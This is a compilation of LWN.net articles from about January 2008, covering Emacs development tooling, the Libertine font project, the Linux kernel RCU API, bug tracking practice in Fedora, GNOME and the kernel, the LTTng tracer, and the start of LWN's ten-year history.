One of the main DVCS features that seems of interest to Stallman is the
"offline" capabilities.  Having the entire history of a project and being
able to do commits of work in progress while being disconnected from the
internet are features that CVS does not have.  Stallman is
adamant that the tools used to develop Emacs be usable by those who are not
always connected to the net which makes a DVCS rather attractive.


The Emacs project is one of the oldest free software projects in existence;
it is, like its founder, fairly resistant to change.  While Emacs itself is
used by hackers everywhere, it is increasingly falling behind its
competitors, at least partially because of the slow pace at which it is developed.
Raymond's belief is that by upgrading the tools used to take advantage of
advances made since CVS and mailman were new, the time between Emacs
releases could be reduced to something more sane.   Doing that could go a
long way towards making Emacs more relevant to younger hackers:

When
those Eclipse fans pointed and laughed because we're still stuck on
CVS and don't have a bug tracker, what counter could I have had?  They
know these are bad choices and they know that I know it -- so when
they write off Emacs as old, tired, and irrelevant to anything they're
interested in, I find it increasingly difficult to reply.


It is unlikely that just some tool changes will be enough to resurrect the
flagging popularity of Emacs, but there are hopeful signs.  Some of
Raymond's suggestions met a warmer reception than one might have expected.
It is clear that a fair number of Emacs fans and developers are frustrated
with the current state of affairs.  It may be that "just some tool changes"
are enough to reinvigorate the project to a point where it attracts more
developers and users.  That can only be a good thing for Emacs.


		The Linux Libertine Open Fonts Project


The

Libertine Open Fonts Project, which first
showed up
on LWN in May, 2006, is an open source font project.
The project's leader is Philipp H. Poll.
The Libertine project description states:


Letters and fonts have two charakteristics: On the one hand they are basic elements of communication and fundament of our culture, on the other hand they are cultural goods and artcraft.
You are able to see just the first aspect, but when it comes to software youll see copyrights and patents even on the most elementary fonts. Therefore we want to give you a free alternative: This is why we founded the Libertine Open Fonts Project.


The Libertine

license information states:


Our fonts are free in the sense of the GPL and OFL. In a nutshell: Changing the font is allowed as long as the derivative work is published under the same license again. Pedantics keep claiming that the embedded use of GPL-fonts in i.e. PDFs requires the free publication of the PDF as well. This, of course, is absolute nonsense, because - to our opinion - the font is not significantly changed by the embedding. To abolish the conflict some members of the FSF have written an addition to the license: the so called Font Exception. Our fonts GPL contains this font exception (since version 2.7). Since version 2.1.9 LinuxLibertine is also licensed under the OFL, which will clarify usability-conflicts.


The Libertine font files are available as both TTF (TrueType) and
OTF (OpenType) fonts.  The Linux-compatible
LaTeX typesetting system
supports the Libertine fonts.  See the Libertine

LaTeX document [PDF] for usage and installation instructions.

Libertine includes a wide variety of

Font Styles.  Numerous languages are supported, and many special
characters are available.
For a look at some of the LaTeX accessible font characters, see the

glyph list document [PDF].


Version 2.7.9 of the Libertine font project was recently
announced.
This release adds hinting, which allows the fonts to be used with
Microsoft Word.  Other changes include improved kern pairs for better
typography, some minor tweaks and some bug fixes.


The libertine fonts are available for download

here.  The fonts come in a standard .tgz file which includes
all of the font collections as both .ttf and .otf files.
The
Fontforge source
files are also available.  Fontforge is an open-source outline font editor.


		RCU part 3: the RCU API


[Editor's note: this is the third and final installment in Paul
McKenney's "What is RCU?" series.  The first and second parts remain available
for those who might have missed them.  Many thanks to Paul for letting LWN
run these articles.]

Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU is most frequently described as a replacement for reader-writer locking,
but has also been used in a number of other ways.
RCU is notable in that RCU readers do not directly synchronize with
RCU updaters,
which makes RCU read paths extremely fast, and also
permits RCU readers to accomplish useful work even
when running concurrently with RCU updaters.

This leads to the question "what exactly is RCU?", a question that this
document addresses from the viewpoint of the Linux kernel's RCU API.


	RCU has a Family of Wait-to-Finish APIs

 
	RCU has Publish-Subscribe and Version-Maintenance APIs

 
	So, What is RCU Really?

These sections are followed by a
references section and the
answers to the Quick Quizzes.


RCU has a Family of Wait-to-Finish APIs
The most straightforward answer to "what is RCU" is that RCU is
an API used in the Linux kernel, as summarized by the pair of tables
in this section
(the first table shows the wait-for-RCU-readers portions of the API,
while the second table shows the publish/subscribe portions of the API).
Or, more precisely, RCU is a family of APIs as shown in the first table,
with each column corresponding to a member of the RCU API family.

If you are new to RCU, you might consider focusing on just one
of the columns in the following table.
For example, if you are primarily interested in understanding how RCU
is used in the Linux kernel, "RCU Classic" would be the place to start,
as it is used most frequently.
On the other hand, if you want to understand RCU for its own sake,
"SRCU" has the simplest API.
You can always come back for the other columns later.

If you are already familiar with RCU, the following pair of tables can
serve as a useful reference.


Quick Quiz 1:
Why are some of the cells in the above table colored green?

The "RCU Classic" column corresponds to the original RCU implementation,
in which RCU read-side critical sections are delimited by
rcu_read_lock() and rcu_read_unlock(), which
may be nested.
The corresponding synchronous update-side primitives,
synchronize_rcu(), along with its synonym
synchronize_net(), wait for any currently executing
RCU read-side critical sections to complete.
The length of this wait is known as a "grace period".
The asynchronous update-side primitive, call_rcu(),
invokes a specified function with a specified argument after a
subsequent grace period.
For example, call_rcu(p,f); will result in
the "RCU callback" f(p)
being invoked after a subsequent grace period.
There are situations,

such as when unloading a module that uses call_rcu(),
when it is necessary to wait for all
outstanding RCU callbacks to complete.
The rcu_barrier() primitive does this job.

In the "RCU BH" column, rcu_read_lock_bh() and
rcu_read_unlock_bh() delimit RCU read-side critical
sections, and call_rcu_bh() invokes the specified
function and argument after a subsequent grace period.
Note that RCU BH does not have a synchronous synchronize_rcu_bh()
interface,
though one could easily be added if required.

Quick Quiz 2:
What happens if you mix and match?
For example, suppose you use rcu_read_lock() and
rcu_read_unlock() to delimit RCU read-side critical
sections, but then use call_rcu_bh() to post an
RCU callback?

In the "RCU Sched" column, anything that disables preemption
acts as an RCU read-side critical section, and synchronize_sched()
waits for the corresponding RCU grace period.
This RCU API family was added in the 2.6.12 kernel, which split the
old synchronize_kernel() API into the current
synchronize_rcu() (for RCU Classic) and
synchronize_sched() (for RCU Sched).
Note that RCU Sched does not have an asynchronous
call_rcu_sched() interface,
though one could be added if required.

Quick Quiz 3:
What happens if you mix and match RCU Classic and RCU Sched?

The "Realtime RCU" column has the same API as does
RCU Classic, the only difference being that RCU read-side critical
sections may be preempted and may block while acquiring spinlocks.
The design of Realtime RCU is described in the LWN article

The design of preemptible read-copy-update.

Quick Quiz 4:
What happens if you mix and match Realtime RCU and RCU Classic?

The "SRCU" column displays a specialized RCU API that permits
general sleeping in RCU read-side critical sections, as was
described in the LWN article
Sleepable RCU.
Of course,
use of synchronize_srcu() in an SRCU read-side
critical section can result in
self-deadlock, so should be avoided.
SRCU differs from earlier RCU implementations in that the caller
allocates an srcu_struct for each distinct SRCU
usage.
This approach prevents SRCU read-side critical sections from blocking
unrelated synchronize_srcu() invocations.
In addition, in this variant of RCU, srcu_read_lock()
returns a value that must be passed into the corresponding
srcu_read_unlock().

The "QRCU" column presents an RCU implementation with the same
API structure as SRCU, but optimized for extremely low-latency
grace periods in absence of readers, as described in the LWN article

Using Promela and Spin to verify parallel algorithms.
As with SRCU, use of synchronize_qrcu() can result in
self-deadlock, so should be avoided.
Although QRCU has not yet been accepted into the Linux kernel, it
is worth mentioning given that it is the only RCU implementation
that can boast deep sub-microsecond grace-period latencies.

Quick Quiz 5:
Why do both SRCU and QRCU lack asynchronous call_srcu()
or call_qrcu() interfaces?

Quick Quiz 6:
Under what conditions can synchronize_srcu() be safely
used within an SRCU read-side critical section?

The Linux kernel currently has a surprising number of RCU APIs and
implementations.
There is some hope of reducing this number, evidenced by the fact
that a given build of the Linux kernel currently has at most
three implementations behind four APIs (given that RCU Classic
and Realtime RCU share the same API).
However, careful inspection and analysis will be required, just as
would be required for one of the many locking APIs.


RCU has Publish-Subscribe and Version-Maintenance APIs
Fortunately, the RCU publish-subscribe and version-maintenance
primitives shown in the following
table apply to all of the variants of RCU discussed above.
This commonality can in some cases allow more code to be shared,
which certainly reduces the API proliferation that would otherwise
occur.


The first pair of categories operate on Linux
struct list_head lists, which are circular, doubly-linked
lists.
The list_for_each_entry_rcu() primitive traverses an
RCU-protected list in a type-safe manner, while also enforcing
memory ordering for situations where a new list element is inserted
into the list concurrently with traversal.
On non-Alpha platforms, this primitive incurs little or no performance
penalty compared to list_for_each_entry().
The list_add_rcu(), list_add_tail_rcu(),
and list_replace_rcu() primitives are analogous to
their non-RCU counterparts, but incur the overhead of an additional
memory barrier on weakly-ordered machines.
The list_del_rcu() primitive is also analogous to its
non-RCU counterpart, but oddly enough is very slightly faster due to the
fact that it poisons only the prev pointer rather than
both the prev and next pointers as
list_del() must do.
Finally, the list_splice_init_rcu() primitive is similar
to its non-RCU counterpart, but incurs a full grace-period latency.
The purpose of this grace period is to allow RCU readers to finish
their traversal of the source list before completely disconnecting
it from the list header -- failure to do this could prevent such
readers from ever terminating their traversal.

Quick Quiz 7:
Why doesn't list_del_rcu() poison both the next
and prev pointers?

The second pair of categories operate on Linux's
struct hlist_head, which is a linear linked list.
One advantage of struct hlist_head over
struct list_head is that the former requires only
a single-pointer list header, which can save significant memory in
large hash tables.
The struct hlist_head primitives in the table
relate to their non-RCU counterparts in much the same way as do the
struct list_head primitives.

The final pair of categories operate directly on pointers, and
are useful for creating RCU-protected non-list data structures,
such as RCU-protected arrays and trees.
The rcu_assign_pointer() primitive ensures that any
prior initialization remains ordered before the assignment to the
pointer on weakly ordered machines.
Similarly, the rcu_dereference() primitive ensures that subsequent
code dereferencing the pointer will see the effects of initialization code
prior to the corresponding rcu_assign_pointer() on
Alpha CPUs.
On non-Alpha CPUs, rcu_dereference() documents which pointer
dereferences are protected by RCU.

Quick Quiz 8:
Normally, any pointer subject to rcu_dereference() should
always be updated using rcu_assign_pointer().
What is an exception to this rule?

Quick Quiz 9:
Are there any downsides to the fact that these traversal and update
primitives can be used with any of the RCU API family members?


So, What is RCU Really?
At its core, RCU is nothing more nor less than an API that supports
publication and subscription for insertions, waiting for all RCU readers
to complete, and maintenance of multiple versions.
That said, it is possible to build higher-level constructs
on top of RCU, including the reader-writer-locking, reference-counting,
and existence-guarantee constructs listed in the companion article.
Furthermore, I have no doubt that the Linux community will continue to
find interesting new uses for RCU,
just as they do for any of a number of synchronization
primitives throughout the kernel.

Finally, a complete view of RCU would also include
all of the things you can do with these APIs.

Acknowledgements
We are all indebted to Andy Whitcroft, Jon Walpole, and Gautham Shenoy,
whose review of an early draft of this document greatly improved it.
I owe thanks to the members of the Relativistic Programming project
and to members of PNW TEC for many valuable discussions.
I am grateful to Dan Frye for his support of this effort.

This work represents the view of the author and does not necessarily
represent the view of IBM.

Linux is a registered trademark of Linus Torvalds.

Other company, product, and service names may be trademarks or
service marks of others.


References
This section gives a short annotated bibliography describing using RCU,
Linux-kernel RCU implementations, background, and historical perspectives.
For more information, see

Paul E. McKenney's RCU Page.


Using RCU

 
	Overview of Linux-Kernel Reference Counting (McKenney,
	January 2007) [PDF].
	Overview of Linux-kernel reference counting (including RCU)
	prepared for the
	Concurrency Working Group of the C/C++ standards committee.

 
	RCU and Unloadable Modules (McKenney, January 2007).
	Describes how to unload modules that use call_rcu(),
	so as to avoid RCU callbacks trying to use the module after it
	has been unloaded.

 
	Recent Developments in SELinux Kernel Performance.
	James Morris describes a performance problem in the SELinux
	Access Vector Cache (AVC), and its resolution via RCU in
	a patch by Kaigai Kohei.

 
	Using Read-Copy-Update Techniques for System V IPC in the
	Linux 2.5 Kernel (Arcangeli et al., June 2003) [PDF].
	Describes how RCU is used in the Linux kernel's System V IPC
	implementation.

Linux-Kernel RCU Implementations

 
	The design of preemptible read-copy-update (McKenney, October 2007).
	Describes a high-performance RCU implementation for realtime use.

 Sleepable RCU (McKenney,
	October 2006).
	Description of SRCU.

 
	Using Promela and Spin to verify parallel algorithms (McKenney,
	August 2007).
	Description of the QRCU patch.

 
	RCU dissertation (McKenney, July 2004) [PDF].
	
	Section 2.2.20 (pages 62-64) gives a history of RCU-like
		mechanisms, a very brief summary of which can be found
		below.
		Chapter 4 (pages 71-98) and Appendix C (pages 326-345) review
		a number of different types of RCU implementations, summarizing
		a number of earlier papers.
		Chapter 5 (pages 137-178) gives an overview of a number of
		"design patterns" guiding use of RCU.
		Chapter 6 (pages 179-234) describes some early uses of RCU.
	

	Using RCU in the Linux 2.5 Kernel (October 2003).
	Brief summary of why RCU can be helpful, along with
	an analogy between RCU and reader-writer locking.

	Anyone who is laboring under the misapprehension that
	the Linux community would never have
	independently invented RCU should read this
	
	netdev posting and
	
	this one as well.
	Both postings pre-date the earliest known introduction of RCU to the
	Linux community.

Background

 
	Real-Time Linux Wiki.
	Provides much valuable information on the -rt patchset for both
	kernel and application developers.

 
	Home of the -rt kernel patchsets.

 
	Memory Ordering in Modern Microprocessors (McKenney, August 2005) [PDF].
	Gives an overview of how Linux's memory-ordering primitives work
	on a number of computer architectures.

Historical Perspectives on RCU and Related Mechanisms

 
	Tornado: Maximizing Locality and Concurrency in a
	Shared Memory Multiprocessor Operating System
	(Gamsa et al., February 1999) [PDF].
	Independent invention of a mechanism very similar to RCU.
	Tornado is a research operating system developed at the
	University of Toronto.
	This operating system uses its analog to RCU pervasively.
	Some of the University of Toronto students brought this operating
	system with them to IBM Research, where it was developed as part of the
	K42 project.

 
	Read-Copy Update: Using Execution History to Solve Concurrency
	Problems (McKenney and Slingwine, October 1998) [PDF].
	First non-patent publication of DYNIX/ptx's RCU implementation.

 
	Passive Serialization in a Multitasking Environment
	(Hennessey et al., February 1989).
	This patent describes an RCU-like mechanism that was apparently
	used in IBM's VM/XA mainframe hypervisor.
	This is the earliest known production use of an RCU-like mechanism.

 
	Concurrent Manipulation of Binary Search Trees (Kung and Lehman,
	September 1980).
	The earliest known publication of an RCU-like mechanism,
	using a garbage collector to implicitly compute grace periods.


Answers to Quick Quizzes
Quick Quiz 1:
Why are some of the cells in the above table colored green?

Answer: The green API members (rcu_read_lock(),
rcu_read_unlock(), and call_rcu()) were the
only members of the Linux RCU API that Paul E. McKenney was aware of back
in the mid-90s.
During this timeframe, he was under the mistaken impression that
he knew all that there is to know about RCU.

Back to Quick Quiz 1.
Quick Quiz 2:
What happens if you mix and match?
For example, suppose you use rcu_read_lock() and
rcu_read_unlock() to delimit RCU read-side critical
sections, but then use call_rcu_bh() to post an
RCU callback?

Answer: If there happened to be no RCU read-side critical
sections delimited by rcu_read_lock_bh() and
rcu_read_unlock_bh() at the time call_rcu_bh()
was invoked, RCU would be within its rights to invoke the callback
immediately, possibly freeing a data structure still being used by
the RCU read-side critical section!
This is not merely a theoretical possibility: a long-running RCU
read-side critical section delimited by rcu_read_lock()
and rcu_read_unlock() is vulnerable to this failure mode.

This vulnerability disappears in -rt kernels, where
RCU Classic and RCU BH both map onto a common implementation.

Back to Quick Quiz 2.
Quick Quiz 3:
What happens if you mix and match RCU Classic and RCU Sched?

Answer: In a non-PREEMPT or a PREEMPT kernel, mixing these
two works "by accident" because in those kernel builds, RCU Classic and RCU
Sched map to the same implementation.
However, this mixture is fatal in PREEMPT_RT builds using the -rt
patchset, due to the fact that Realtime RCU's read-side critical
sections can be preempted, which would permit
synchronize_sched() to return before the
RCU read-side critical section reached its rcu_read_unlock()
call.
This could in turn result in a data structure being freed before the
read-side critical section was finished with it,
which could in turn greatly increase the actuarial risk experienced
by your kernel.

In fact, the split between RCU Classic and RCU Sched was inspired
by the need for preemptible RCU read-side critical sections.

Back to Quick Quiz 3.
Quick Quiz 4:
What happens if you mix and match Realtime RCU and RCU Classic?

Answer: That would be up to you, because you would have
to code up changes to the kernel to make such mixing possible.
Currently, any kernel running with RCU Classic cannot access
Realtime RCU and vice versa.

Back to Quick Quiz 4.
Quick Quiz 5:
Why do both SRCU and QRCU lack asynchronous call_srcu()
or call_qrcu() interfaces?

Answer: Given an asynchronous interface, a single task
could register an arbitrarily large number of SRCU or QRCU callbacks,
thereby consuming an arbitrarily large quantity of memory.
In contrast, given the current synchronous
synchronize_srcu() and synchronize_qrcu()
interfaces, a given task must finish waiting for a given grace period
before it can start waiting for the next one.

Back to Quick Quiz 5.
Quick Quiz 6:
Under what conditions can synchronize_srcu() be safely
used within an SRCU read-side critical section?

Answer: In principle, you can use
synchronize_srcu() with a given srcu_struct
within an SRCU read-side critical section that uses some other
srcu_struct.
In practice, however, doing this is almost certainly a bad idea.
In particular, the following could still result in deadlock:


Back to Quick Quiz 6.
Quick Quiz 7:
Why doesn't list_del_rcu() poison both the next
and prev pointers?

Answer: Poisoning the next pointer would interfere
with concurrent RCU readers, who must use this pointer.
However, RCU readers are forbidden from using the prev
pointer, so it may safely be poisoned.

Back to Quick Quiz 7.
Quick Quiz 8:
Normally, any pointer subject to rcu_dereference() must
always be updated using rcu_assign_pointer().
What is an exception to this rule?

Answer: One such exception is when a multi-element linked
data structure is initialized as a unit while inaccessible to other
CPUs, and then a single rcu_assign_pointer() is used
to plant a global pointer to this data structure.
The initialization-time pointer assignments need not use
rcu_assign_pointer(), though any such assignments that
happen after the structure is globally visible must use
rcu_assign_pointer().

However, unless this initialization code is on an impressively hot
code-path, it is probably wise to use rcu_assign_pointer()
anyway, even though it is in theory unnecessary.
It is all too easy for a "minor" change to invalidate your cherished
assumptions about the initialization happening privately.

Back to Quick Quiz 8.
Quick Quiz 9:
Are there any downsides to the fact that these traversal and update
primitives can be used with any of the RCU API family members?

Answer: It can sometimes be difficult for automated
code checkers such as "sparse" (or indeed for human beings) to
work out which type of RCU read-side critical section a given
RCU traversal primitive corresponds to.
For example, consider the following:


Is the rcu_dereference() primitive in an RCU Classic
or an RCU Sched critical section?
What would you have to do to figure this out?

Back to Quick Quiz 9.

		Development issues part 2: Bug tracking


Once upon a time, free software was a relatively rare commodity, and there
was a real novelty in being able to run a free package for a specific
purpose.  The availability of a free C compiler, for example, was cause for
celebration.  The fact that said compiler was not always the most reliable
program on the system did little to reduce enthusiasm; many of us persisted in
irrational endeavors (like trying to use gcc to build the X Window System)
despite the occasionally painful (and predictable) consequences.  And, in
the process, we helped to make both programs more reliable. 


There comes a time, though, when even the most die-hard free software
proponent wishes that things would just work.  As our software finds its
way into more situations where failures are unwelcome (at best), the level
of tolerance for bugs is falling.  The desire for fewer flaws, however,
runs counter to the desire for increasingly capable (and thus more complex)
software. 
Somehow we have to find ways to simultaneously grow our systems and reduce
the total number of bugs.  To this end, a few projects have been having
some interesting discussions on the tracking and fixing of bugs.


As has been discussed in this companion article, 
Eric Raymond has been busily stirring up trouble on the Emacs development
list.  His point, deemed reasonable by your editor, is that Emacs must
adopt a number of relatively modern development practices if it is to have
any hope of remaining relevant at all.  One of
his key points is that Emacs needs to have a real bug tracking system.
Says Eric:


	Now I consider Emacs: 1100K lines, a COCOMO estimate of over 328
	years, and no issue database. I think I think I understand much
	better now now why the team has only been able to ship one release
	in five years.  Trying to converge on a releasable state with as
	poor a view of the Emacs bug load as we have must be damn near
	impossible.


While some of Eric's suggestions appear to be non-starters - imagine trying
to get Richard Stallman to hang out on an IRC channel - the bug tracker
suggestion might just go somewhere.  Certainly it could only be an
improvement for a project of that size to have some sort of idea of what
the current list of outstanding bugs looks like.  It might even help bring
about another Emacs release before the end of the decade.

Bug trackers are not a magical solution to the bug problem, though; in
fact, they can create some problems of their own.  The Fedora project,
which does have a bug tracker, is currently trying to figure out what to do
with the contents of that tracker.  It seems that said tracker contains 
over 13,000 bugs, almost 10,000 of which apply to Fedora 7 and later.

A bug database of this size is simply overwhelming to anybody who tries to
do something about it.  As a result, Fedora users are filing bugs, only to
see nothing happen in response.  Not even a "thanks for your report"
message.  This situation is discouraging for everybody involved, causing
Fedora users to give up on reporting bugs and developers to fear looking at
the tracker.


In the Fedora case, there appears to be a near-consensus that the biggest
problem is in triaging bug entries.  This is not a job which can be
automated; somebody has to go through bug submissions, weed out the
duplicates, identify those which are really "features," figure out which
developer should be notified, etc.  Tying bug entries to those found in
upstream trackers would be a highly useful bonus.  Without this sort of
effort, the bug tracker quickly fills with low-quality entries which help
nobody.

For the most part, nobody is doing this job for Fedora now.  Red Hat is not
paying for a staff member to triage bugs, and the wider community has not
filled this gap.  In the short term, any sort of solution looks like it
will have to come from the community, so the Fedora folks are wondering
what can be done to encourage more participation.  Simply asking for help
is the obvious first step, as is making sure that the process is easy.
Then they may consider the tactics adopted by other large projects -
Mozilla's policy of expressing its appreciation by sending a T-shirt, for
example. 

As an aside, one of the more useful bits of information to come from this
discussion was the existence of this family of URLs:


Fill in the name, and the result is an immediate list of open bugs
for the given package.  Thus, for example, a visit to bugz.fedoraproject.org/gcc
yields a list of compiler bugs.  This result can be had directly from
bugzilla, of course, but this interface is faster and easier.

The Fedora developers have discussed a number of related issues, such as
whether the Fedora bug database should be separated from the RHEL system
and what can be done to make Red Hat better appreciate the value of doing
more of its quality assurance work in the Fedora repository.  But the core
problem is just getting human attention applied to the bug reports.
Digging through bug databases is a relatively unglamorous job; it is not an
easy path toward rock-star hacker status.  But it is an important and
relatively easy way to help make free software better.

Just in time to serve as an example of how well bug management can work,
the GNOME project has posted its annual
bugzilla statistics.  It seems that over 110,000 GNOME bugs were filed
in 2007, almost 109,000 of them were closed.  The top bug-closers for the
year were:


It is worth pondering for a moment on the amount of energy required to
close over 14,000 bugs in a year - that's almost 40 per day, every day,
without a break.  This kind of energy does exist within our
community, and some projects are putting it to very good use.


While it is easy to get a contrary impression, the kernel does, in fact,
have a bug tracker; there is
also, in the form of Natalie Protasevich, somebody who handles the care and
feeding of that tracker.  But, as a recent episode shows, that still is not
always sufficient to actually get the bugs fixed.


On November 13, 2007, a bug
in the SCSI subsystem was reported to the linux-kernel mailing list.
It was put into the tracker as bug 9370 on the
same day.  Some developers looked at it over the next few days, but, even
though a specific commit which appeared to cause the bug had been
identified, no solution was forthcoming.  Discussion eventually died out.
At least until January 2, when Ingo Molnar decided to stir the pot by
posting a patch to revert the seemingly
guilty commit.  
At that point the discussion picked up and a reliable way of reproducing
the bug was found.  The commit which was said to have caused the problem
was, in fact, not guilty; it had just caused an older bug to come to
light.  The discussion did not stop there, though.


A number of charges went back and forth which do not require discussion
here.  But one core point is this: as long as the bug report sat in the
tracker, nothing much appeared to be happening with it - though, it seems,
the SCSI developers had not forgotten it and were trying to figure out what
was really going on.  But once the problem came back to the linux-kernel
list in the form of a brute-force solution, the root cause was found in
short order.  The key here was bringing the problem to the attention of a
wider group of people; the crucial recipe for
reproducing the problem came from a developer who had not been looking
at the problem previously.


In the kernel context, at least, giving wide exposure to a bug often helps
immensely in getting that bug fixed.  That is especially true for the sort
of hard-to-reproduce bugs which tend to come up in kernel programming.  So,
while bug trackers are a useful tool for ensuring that problems do not fall
through the cracks, it seems that one of the most potent anti-bug tools we
have - discussing the problem via a widely-distributed email list - is the
same tool we have been using for decades.

		The Linux trace toolkit's next generation


 Instrumenting a running kernel for debugging or profiling is on the
wish list of many administrators and developers.  Advocates of OpenSolaris
like to point to DTrace as a
feature that Linux lacks, though SystemTap has started to close
that gap.  The Linux Trace Toolkit next
generation (LTTng) takes a different approach and was recently
submitted for inclusion in the kernel (in two patches: arch independent and arch dependent).  

LTTng relies upon kernel
markers to provide static probe points for its kernel tracing
activities.  It also provides the ability to trace userspace programs and
combine that data with kernel tracing data to give a detailed view of
the internals of the system.  Unlike other tools, LTTng takes a
post-processing approach, storing the data away as efficiently as possible
for later analysis.  This is in contrast to SystemTap and DTrace which have their own
mini-languages that specify what to do as each trace point is reached.


One of the major design goals of LTTng is to have as little impact on the
system as possible, not only when it is actually tracing events, but also
when it is disabled.  Kernel hackers are quite resistant to debugging
solutions that add any significant performance penalty when not in use.  In addition, any
significant delays while enabled may change the system timing such that the bug or
condition being studied does not occur.  For this reason, LTTng does not
take the path that various dynamic tracing solutions have used and avoids
the expense of a breakpoint interrupt by using the static markers.


Another major design goal is to provide monotonically increasing timestamp
values for events.  The original LTT uses timestamps derived from the
kernel Network Time Protocol (NTP) time, which can fluctuate somewhat as
adjustments are made – sometimes going backward.  LTTng uses a
timestamp derived from the hardware clocks that will work on various
processor architectures and clock speeds.  In addition, the timestamps can
be correlated between different processors in a multi-processor system. 

 As LTTng gathers its data, it uses relayfs to get the data to a
userspace daemon (lttd) that writes the data to disk.  The daemon
is started from the lttctl command-line tool, which controls the
tracing settings in the kernel via a netlink socket.  A user wishing to
investigate tracing could use lttctl to start and stop a trace;
once the trace is complete, the data could be viewed and analyzed.

The LTT viewer (LTTV) is the program that is used to analyze the data
gathered.  It provides both GUI and text-based viewers to interpret the
binary data generated by LTTng and present it to the user.  Multi-gigabyte
files of tracing data are not uncommon when using LTTng, so a tool like
LTTV is indispensable for visualization and filtering to allow the user to
focus on the events of interest.  LTTV has a plugin mechanism that allows
users to develop their own display and analysis tools, while using the LTTV
framework and filtering capabilities.


An advantage of using static probe points – though some may see it as
a disadvantage – is that they can be maintained with the kernel code
they are targeting.  If the kernel markers patch is merged, subsystems can
add probe points at places they find interesting or useful and those
markers will be carried along in the kernel source; updated as the
kernel changes.  Other solutions rely on matching an external list of
probes with the version of the running kernel, which can result in
mismatches and incorrect traces.  Also, SystemTap will be able to use any
markers that get added to the kernel as is, so users who want the abilities
that it provides will also benefit.


LTTng is being developed at the École Polytechnique de
Montréal with support from quite a few Linux companies.  It
has the looks of a very well thought out framework that builds upon the
tracing work that has been done before.  It certainly won't make it into
2.6.24, but it would seem to have a good chance of making it into a future
mainline kernel.


		LWN.net: a ten-year timeline (part 1)


LWN is about to celebrate a birthday.  Picking the true anniversary of an
enterprise like LWN can be a bit tricky - there are many points which could
be said to mark the true birth of the organization.  After some thought, we
have decreed that LWN.net was born on January 30, 1998.  So we have a
tenth anniversary coming up.  That's a long time - far longer than any of
us thought we would be doing this.  Life is funny that way, somehow.


One cannot let a date like this go by without at least partially taking
advantage of its hype-creation possibilities.  So there will be a few
things happening to celebrate our decade of writing about Linux,
culminating with some sort of celebration on the 30th, when your editor
will be speaking at this year's (sold-out!) linux.conf.au in Melbourne,
Australia.  One of those will be a short series of articles - starting with
this one - looking back at those ten years.  What a long, strange trip it
has been.


Back in early 1997, your editor was the manager of a software development,
system administration, and data delivery group at the National Center for
Atmospheric Research.  He had, at that point, been using Linux for a few
years.  It was running on a number of servers, of course, but we had also
deployed it on desktops and used it for the acquisition and display of
meteorological data, including high-bandwidth (for the time) doppler radar
data.  Don't let anybody tell you that real-time Linux is a new thing.


At this time, your editor was seeing two futures: (1) an increasingly
dilbertesque life spent mostly in meetings, and (2) the clearly
bright future of Linux.  So he was actively looking for ways to move out of
conference rooms and toward Linux, and talking over schemes with a number
of friends.  An early idea - to commercialize one
of the first weather stations ever put on the World Wide Web with LWN
editor Forrest Cook, never quite took off.  But that thought process
continued. 

During that same time, Elizabeth Coolbaugh had just left a very similar
position at the same institution; she was looking for a new project for the
next phase of her life.  After some discussions, Liz and your editor
settled on a business idea which seemed to have some promise.  It was not
to be the last silly decision they were to make.


You see, at that time there was a struggling Linux distributor named Red
Hat which was beginning to get the sense that there might be a market for
its boxed Linux product in the corporate world.  But companies need
support, and Red Hat lacked the ability to provide that support.  So the
company's management came up with the "support partner" concept.  Upon
being accepted into this program, partner companies would be able to sell
Red Hat-backed support certificates, which Red Hat would help to market.
This widespread network of Linux experts would be able to provide local
support to clients and would, for the hardest problems, be able to get help
from Red Hat itself.  It looked like a winner for everybody involved.


That program was not yet operational at this time, though - but Red Hat
promised it would be Real Soon Now.  Your soon-to-be editors, not yet
having done much business with Red Hat beyond ordering an occasional CD,
believed this promise.  But it still made sense to do something productive while
waiting.  The idea that emerged after some talk was to put up a regular
newsletter about what was happening in the fast-evolving Linux community.
Even back then, keeping up with everything was hard, so we figured that the
service would be valuable.  As an added bonus, it would attract attention
to this new support company (called Eklektix) and show just how blindingly
smart and up on Linux we were.


Discussion of details occurred slowly through much of 1997.  On
January 22, 1998, the first
issue of LWN was posted; it talked about the 2.1.79 kernel, the brand-new
spinlock mechanism, the devfs debate, the creation of Red Hat Advanced
Development Labs, and attempts to bring Java to Linux.  The January 29, 1998 issue changed
the format and led off
with Netscape's announcement that it would be releasing the source code for
its browser.  We also found all of two news articles about Linux (we posted
every one we found in those days) and talked about NFS problems, the devfs
debate, the Debian 2.0 release roadmap, and gcc 2.8 problems.


At this point, we had posted two issues, but had not actually told anybody
about them.  Unsurprisingly, traffic was low.  That changed on
January 30, when our
announcement made it out to the comp.os.linux.announce newsgroup - the
best way to get the news out at that time.  As promotional text the
announcement was rudimentary at best, but it had the desired result - we
got over 1000 page views on that first day, which seemed like a lot at the
time.  LWN was off and running.


Some highlights from the early days of LWN:


 February 12, 1998: Eric
     Raymond starts pushing "open source" instead of free software.
     Worries over whether Intel's proposed "Merced" architecture would
     support Linux.
     <!-- http://lwn.net/1998/0219/a/rms.html rms free software -->

 February 19, 1998: Richard
     Stallman fights back against Open Source.  SCO claims to be the
     largest provider of Unix-based servers.  Jesse Berst's famous "could
     you get fired for choosing Linux?" article runs.  Jaroslav Kysela
     launches the "Ultra" (later ALSA) sound driver project.

 March 12, 1998: Ralph Nader
     suggests that Dell should sell Linux-installed systems.

 March 19, 1998: Bruce Perens
     resigns from the Debian project, saying: "I'm
     sorry it had to be this way, but I feel that my mission to bring free
     software to the masses really isn't compatible with Debian any longer,
     and that I should be working with one of the more mainstream Linux
     distributions."  Sendmail, Inc. was launched.

 April 2, 1998: the Mozilla
     source release happens.  Alan Cox joins Red Hat.  The feature freeze
     for the 2.2 kernel is announced.  The Open Group announces that use of
     the X Window System will requires fees - but Linux users had XFree86
     and didn't care.


It's fair to say that we didn't entirely grasp the significance of the
events reported in the April 2 edition.  The hiring of Alan Cox was
one of the first in a long series - before then, almost nobody actually had
a job which involved developing Linux.  The Open Group's attempt to
relicense X was thoroughly defeated by the existence of a free version with
an active development community - a story which would be repeated a number
of times in the coming years.


 April 30, 1998: Red Hat gets
     around to launching its support program, with Eklektix as one of the
     four they had managed to sign up.  Kernel development halts as a
     result of the birth of Linus's second child.

 May 28, 1998: LWN moves to its
     own domain at LWN.net.  The Linux Standard Base is proposed.  Your
     editor first describes himself as "grumpy" after producing LWN by
     himself (Liz was at Linux Expo).  PC Week calls Linux "a communist
     operating system in a capitalist society" and predicts its demise.
